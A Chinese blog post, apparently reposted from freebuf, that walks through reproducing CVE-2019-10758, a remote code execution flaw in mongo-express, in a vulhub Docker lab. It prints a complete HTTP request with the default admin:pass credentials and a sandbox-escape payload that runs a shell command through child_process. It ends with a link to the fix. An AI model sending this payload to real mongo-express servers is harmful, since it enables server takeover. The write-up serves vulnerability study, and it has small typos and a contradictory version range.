漏洞简介:
此软件包的受影响版本容易受到使用toBSON方法的端点通过远程执行代码(RCE)攻击的攻击。 在非安全环境中滥用vm依赖关系来执行exec命令。 默认用户名是admin,密码是pass。
威胁类型
远程代码执行
威胁等级
高
漏洞编号
CVE-2019-10758
受影响系统及应用版本
mongo-express,版本0.54.0及更低版本
不受影响的版本
mongo-express 0.54.0或更高版本。
漏洞复现:
这个漏洞环境感觉vulhub的就可以满足,所以选择搭建vulhub的环境
vulhub下载
git clone https://github.com.cnpmjs.org/vulhub/vulhub
这里还有个小福利,有没有觉得经常git clone的时候特别慢?几K、十几K的下载?
为了解决这个问题,尝试了好多方法,总结了一个最有效的方法
git clone的时候在把https://github.com换成: https://github.com.cnpmjs.org/
这是一个国内的github镜像站,下载速度..怎么说呢,起飞!
安装docker(我之前安装过)
安装docker-compose
pip install docker-compose
启用docker,拉取镜像,启动环境
PS:这就又要说一个福利了,docker pull的时候有没有感觉很慢?放着阿里这么大的靠山得用起来呀
https://cr.console.aliyun.com/#/accelerator
登录阿里云进去,左下角有个docker镜像加速,按步骤来,然后…起飞!!
(都是一个坑一个坑摸出来的…)
至此环境搭建成功!
环境启动后,访问http://192.168.192.128:8081即可查看到Web页面。
攻击复现:
直接发送如下数据包,即可执行代码
POST /checkValid HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded Content-Length: 124 document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
Poc目标:在/tcp下创建success文件
发送数据包后访问 http://localhost:8081
查看是否创建成功:
docker-compose exec web ls /tmp
成功创建uccess文件,都到这一步了,还能做什么自由发挥~
ps:此文章仅用于交流学习~
2、修复建议
https://github.com/mongo-express/mongo-express/commit/d8c9bda46a204ecba1d35558452685cd0674e6f2
在0.54.0中将bson.js中的vm依赖删除,改用mongo-query-parser
来源:freebuf.com 2020-08-03 14:55:38 by: whhbtl
请登录后发表评论
注册